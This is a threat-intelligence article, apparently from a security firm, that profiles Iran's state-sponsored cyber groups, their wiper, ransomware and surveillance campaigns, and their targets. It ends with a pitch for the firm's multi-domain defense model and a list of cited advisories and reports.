Continue your mission
Iran operates one of the most active and aggressive state-sponsored cyber programs in the world. Unlike Russia's preference for surgical espionage or North Korea's focus on financial theft, Iran's cyber doctrine combines destructive capability with intelligence collection, regional coercion, and ide
# Iran's Cyber Operations
Iran operates one of the most active and aggressive state-sponsored cyber programs in the world. Unlike Russia's preference for surgical espionage or North Korea's focus on financial theft, Iran's cyber doctrine combines destructive capability with intelligence collection, regional coercion, and ideological messaging. The Iranian cyber apparatus serves as a force multiplier for a nation that cannot match Western or Israeli conventional military power but has repeatedly demonstrated willingness to cause serious harm in cyberspace.
The Iranian government conducts cyber operations through two primary institutional pillars: the Islamic Revolutionary Guard Corps (IRGC) and the Ministry of Intelligence and Security (MOIS). These organizations sponsor, direct, and in some cases directly operate advanced persistent threat (APT) groups that target energy infrastructure, financial systems, government networks, and the personal devices of dissidents, journalists, and diaspora communities worldwide.
Iran's tradecraft has evolved significantly since the early 2010s. The country began as a recipient of cyberattacks (most notably Stuxnet, the U.S.-Israeli operation that damaged Iranian nuclear centrifuges in 2010) and emerged as a capable offensive operator in its own right. Iranian actors now deploy destructive malware, conduct hack-and-leak operations, run influence campaigns, and carry out ransomware attacks that serve both financial and geopolitical objectives. Understanding this program requires understanding the organizational structure behind it, the strategic objectives it serves, and the operational characteristics that distinguish Iranian actors from other state-sponsored threats.
IRGC Cyber Command
The Islamic Revolutionary Guard Corps functions as the dominant military and intelligence institution in Iran, with a cyber component that conducts both offensive operations and domestic surveillance. The IRGC sponsors APT33 (also known as Elfin or Peach Sandstorm by Microsoft), one of the most technically capable Iranian threat groups. APT33 focuses primarily on the aerospace and energy sectors, with sustained targeting of Saudi Arabia, the United States, and South Korea. The group uses spear-phishing campaigns, password spraying at scale, and exploitation of edge devices to gain initial access. Once inside, APT33 deploys destructive wipers to cause maximum damage rather than simply exfiltrating data.
APT34 (also called OilRig or Hazel Sandstorm) is also associated with IRGC-adjacent operations and specializes in targeting governments, financial institutions, and telecommunications providers across the Middle East. APT34 is known for its custom tooling, including a variety of backdoors and credential-harvesting tools that enable long-term persistence on compromised networks. The group uses DNS tunneling for command-and-control communications, a technique that allows malicious traffic to blend with legitimate network activity.
Ministry of Intelligence and Security (MOIS)
MOIS sponsors APT35 (also called Charming Kitten or Mint Sandstorm), which focuses on espionage rather than destruction. APT35 targets journalists, human rights activists, academics, diplomats, and members of the Iranian diaspora. The group runs sophisticated social engineering campaigns, including fake interview requests, conference invitations, and research collaboration offers. APT35 has developed elaborate personas, building rapport with targets over weeks or months before delivering malicious links or attachments. The group also conducts SMS phishing (smishing) campaigns targeting mobile devices.
MuddyWater (also tracked as Mango Sandstorm) operates under MOIS direction and targets government agencies, telecommunications providers, and defense contractors across the Middle East, Europe, and Central and South Asia. MuddyWater relies heavily on publicly available offensive tools and frameworks, including PowerShell Empire and Metasploit, making attribution more complex. The group uses spear-phishing with malicious attachments and exploits vulnerabilities in internet-facing applications.
Regional Power Projection
Iran uses cyber operations to signal capability and coerce regional rivals, particularly Saudi Arabia, the United Arab Emirates, and Israel. Destructive attacks on Gulf state infrastructure serve as both retaliation for perceived aggression and a demonstration that Iran can impose costs without triggering conventional military response. This coercive strategy operates below the threshold of armed conflict while achieving tangible geopolitical effects.
Destructive Capability as Deterrence
Iran's most consequential offensive capability is its use of disk-wiping malware. Shamoon, deployed against Saudi Aramco in 2012, destroyed the master boot records of approximately 35,000 computers, rendering them inoperable and temporarily disrupting oil production at the world's largest oil company. A second Shamoon campaign targeted Gulf state organizations in 2016 and 2017. ZeroCleare, a wiper attributed to Iranian actors and deployed against energy and industrial companies in the Middle East in 2019, combined elements of commercial software with custom code to overwrite disk sectors and corrupt file system structures. These destructive operations serve as a deterrent signal: Iran is willing to cause serious economic damage and has the tools to do it.
Surveillance of Diaspora and Dissidents
APT35 and related actors run persistent campaigns against Iranian dissidents, opposition figures, journalists, and diaspora communities. These operations serve the domestic political interests of the Iranian government by monitoring and intimidating critics abroad. Targets have included members of groups the Iranian government designates as terrorist organizations, reporters covering Iranian affairs, and academics who study Iranian politics. The surveillance objective explains why Iranian cyber operations often target individuals with sophisticated, persistent social engineering rather than the rapid, automated attacks used against corporate networks.
Ransomware as Economic Warfare
Since 2020, Iranian actors have increasingly deployed ransomware as a revenue-generating and coercive tool. Pay2Key, Black Shadow, and related operations attributed to Iranian-linked actors have targeted Israeli companies specifically, deploying ransomware and then threatening to leak stolen data publicly. These operations blur the line between cybercrime and state-sponsored attacks: they generate revenue, coerce victims, and advance geopolitical objectives against Israel simultaneously. The hack-and-leak component, where stolen data is published on dedicated leak sites, adds an influence operations dimension to what might otherwise appear to be conventional ransomware.
Iranian and Russian cyber actors have demonstrated growing operational coordination since 2019. A joint NSA/NCSC advisory documented instances where Iranian actors used Russian-controlled infrastructure and vice versa, though the relationship is one of tactical convenience rather than formal alliance. Iran and Russia share strategic interests in undermining Western institutions and destabilizing shared adversaries, which creates conditions for cooperation even in the absence of formal agreements.
Iran's cyber program poses a material threat to critical infrastructure operators, financial institutions, and governments across the Middle East, Europe, and the United States. The 2012 Shamoon attack on Saudi Aramco remains one of the most destructive cyberattacks ever executed against a private company. The 2014 Sands Casino attack (attributed to Iran) wiped systems and disrupted operations at a Las Vegas resort whose owner had publicly called for nuclear strikes on Iran. These incidents demonstrate that Iranian actors are willing to cross lines that most state-sponsored groups avoid.
The ransomware campaigns targeting Israeli companies represent a new model for state-sponsored coercion: using financially motivated attack patterns as cover for geopolitical operations. This approach complicates attribution and response, because victims and governments must determine whether an attack is criminal, state-sponsored, or both before choosing a proportional response.
For U.S. critical infrastructure, Iranian actors have targeted water utilities, energy companies, and financial institutions. In 2021, Iranian actors were linked to attempted intrusions at water treatment facilities. In 2023, CISA and FBI issued joint advisories warning that Iranian government-affiliated actors were actively exploiting vulnerabilities in Unitronics programmable logic controllers used in water and wastewater systems. These operations probe the exact systems whose disruption would cause the most civilian harm.
The surveillance operations against diaspora communities have direct human rights implications. Iranian-Americans, Iranian-Canadians, and Iranians living in Europe face ongoing targeting of their personal devices, communications, and social networks by MOIS-affiliated actors. Researchers, journalists, and civil society organizations that cover Iran face persistent, sophisticated social engineering campaigns.
Iran's cyber operations illustrate precisely why CDA's Planetary Defense Model treats all six domains as simultaneously active. Iranian actors do not follow a clean sequential pattern; a single campaign can involve destructive operations against data (DPS), initial access through unpatched vulnerabilities (VSD), evasion via administrative tools (SPH), credential theft and identity abuse (IAT), and sophisticated threat intelligence collection that the defender must counter with equal sophistication (TID), while regulated organizations facing Iranian attacks must also maintain compliance continuity throughout an active incident (RGA).
The Predictive Defense Intelligence (PDI) methodology within the TID domain addresses Iranian operations directly. PDI requires organizations to build detection pipelines tuned to specific actor TTPs rather than relying on generic indicators of compromise. Iranian actors use publicly documented techniques: password spraying against Microsoft 365 and Azure AD, spear-phishing with malicious OneDrive links, exploitation of known vulnerabilities in VPN appliances and firewalls. PDI maps these known patterns to ATT&CK techniques and builds detection rules that fire on behavioral indicators rather than waiting for signature matches against known malware hashes, which change with each campaign.
When Iranian destructive operations hit, the Planetary Crisis Protocol (PCP) provides the cross-domain incident response structure that a purely technical MSSP cannot. Wiper malware attacks simultaneously destroy data (DPS incident), collapse infrastructure built on vulnerable systems (VSD incident), demonstrate that posture monitoring failed to catch pre-attack reconnaissance (SPH incident), and trigger mandatory regulatory reporting (RGA incident). PCP coordinates response across all six domains simultaneously, assigning domain-specific response actions to parallel workstreams rather than sequential remediation steps that assume the attack is confined to one area.
CDA's approach differs from conventional managed security providers in this specific area: most MSSPs treat Iranian threat actor coverage as a detection-and-response problem confined to endpoint and network monitoring. The PDM treats it as an all-domain problem requiring synchronized defense, where a weakness in any single domain creates an exploitable gap that Iranian actors, with their patience and persistence, will eventually find and use.
Morgan, Evan. "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran." Irregular Warfare Initiative, Princeton University / Modern War Institute at West Point, November 2025.
Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA). "Iranian Government-Sponsored Actors Conducting Spearphishing Campaign." Joint Cybersecurity Advisory AA21-321A. November 2021.
Microsoft Threat Intelligence. "Peach Sandstorm Password Spray Campaigns Enable Intelligence Collection at High-Value Targets." Microsoft Security Blog, September 2023.
Mandiant. "APT34: New Targeted Attack in the Middle East." Mandiant Threat Intelligence Report, 2019.
Crowdstrike. "2024 Global Threat Report." CrowdStrike Intelligence, February 2024.
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.